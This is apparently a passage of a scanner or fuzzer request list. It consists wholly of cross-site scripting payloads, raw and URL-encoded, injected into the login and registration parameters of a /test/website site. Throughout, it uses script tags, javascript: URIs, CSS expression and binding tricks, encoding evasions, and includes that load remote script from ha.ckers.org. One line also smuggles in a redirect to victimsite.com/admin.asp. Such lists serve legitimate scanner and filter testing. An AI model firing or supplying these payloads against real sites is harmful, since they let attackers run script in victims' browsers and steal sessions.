alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&
/test/website/register.php?password=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/test/website/index.php?name=<IMG+SRC=javascript:alert('XSS')>
/test/website/?name=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/test/website/register.php?username=<IMG+"""><SCRIPT>alert("XSS")</SCRIPT>">
/test/website/index.php?name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
/test/website/register.php?password2=Redirect+302+/a.jpg+http://victimsite.com/admin.asp&deleteuser
/test/website/register.php?username=<DIV+STYLE="width:+expression(alert('XSS'));">
/test/website/register.php?password2=<XSS+STYLE="xss:expression(alert('XSS'))">
/test/website/register.php?name=<META+HTTP-EQUIV="Set-Cookie"+Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/test/website/index.php?password=<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
/test/website/index.php?password=<IMG+SRC="jav&#x0D;ascript:alert('XSS');">
/test/website/index.php?username=<SCRIPT+a="blah"+''+SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/test/website/register.php?name=%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
/test/website/index.php?name='';!--"<XSS>=&{()}
/test/website/register.php?password2=<IMG+SRC="javascript:alert('XSS');">
/test/website/register.php?password=%3CIMG+DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/register.php?name=<DIV+STYLE="background-image:+url(&#1;javascript:alert('XSS'))">
/test/website/index.php?username=<IMG+SRC=JaVaScRiPt:alert('XSS')>&password=<IMG+SRC=JaVaScRiPt:alert('XSS')>&name=<IMG+SRC=JaVaScRiPt:alert('XSS')>&
/test/website/register.php?name=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/test/website/register.php?username=<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
/test/website/register.php?password=%3CBGSOUND+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
/test/website/?username=<?+echo('<SCR)';+echo('IPT>alert("XSS")</SCRIPT>');+?>&password=<?+echo('<SCR)';+echo('IPT>alert("XSS")</SCRIPT>');+?>&name=<?+echo('<SCR)';+echo('IPT>alert("XSS")</SCRIPT>');+?>&
/test/website/index.php?username=%3COBJECT+classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam+name%3Durl+value%3Djavascript%3Aalert%28%27XSS%27%29%3E%3C%2FOBJECT%3E
/test/website/index.php?username=<STYLE+type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
/test/website/index.php?username=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/test/website/index.php?username=%3CXML+ID%3D%22xss%22%3E%3CI%3E%3CB%3E%3CIMG+SRC%3D%22javas%3C%21--+--%3Ecript%3Aalert%28%27XSS%27%29%22%3E%3C%2FB%3E%3C%2FI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%22%23xss%22+DATAFLD%3D%22B%22+DATAFORMATAS%3D%22HTML%22%3E%3C%2FSPAN%3E
/test/website/index.php?username=<STYLE+type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
/test/website/register.php?password=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E
/test/website/index.php?name=<IMG+SRC="jav+ascript:alert('XSS');">
/test/website/register.php?username=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/index.php?name=%3CBASE+HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E
/test/website/index.php?username=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E&password=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E&name=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E&
/test/website/index.php?username=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E
/test/website/?username=<OBJECT+TYPE="text/x-scriptlet"+DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
/test/website/?username=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E
/test/website/?password=<IFRAME+SRC=http://ha.ckers.org/scriptlet.html+<
/test/website/?username=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/test/website/?username=%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E&password=%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E&name=%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E&
/test/website/register.php?password2=<A+HREF="http://0102.0146.0007.00000223/">XSS</A>
/test/website/register.php?password2=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/test/website/?name=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/test/website/index.php?username=\";alert('XSS');//
/test/website/index.php?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E
